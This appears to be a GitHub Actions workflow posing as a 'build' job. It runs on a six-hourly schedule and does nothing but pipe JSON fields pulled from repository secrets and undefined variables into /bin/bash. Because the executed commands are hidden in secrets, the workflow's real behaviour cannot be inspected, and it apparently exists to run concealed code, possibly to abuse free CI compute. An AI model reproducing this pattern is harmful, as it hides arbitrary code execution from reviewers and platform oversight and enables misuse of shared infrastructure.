name: xuejingxin7641
on:
  workflow_dispatch:
  schedule:
    - cron: '46 3/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: xuejingxin7641
        env:
          hl32: ${{ secrets.hl32 }}
        run: |
          echo $hl32 | jq -r .vsrrs118 | /bin/bash
          echo $pvv1043 | jq -r .llak8 | /bin/bash
          echo $ignu1706 | jq -r .odjt090 | /bin/bash
          echo $p62067 | jq -r .qhmby88776 | /bin/bash
          echo $o7 | jq -r .ek46777 | /bin/bash
          echo $u38 | jq -r .rlszm82880 | /bin/bash
          echo $o8 | jq -r .tc2715 | /bin/bash

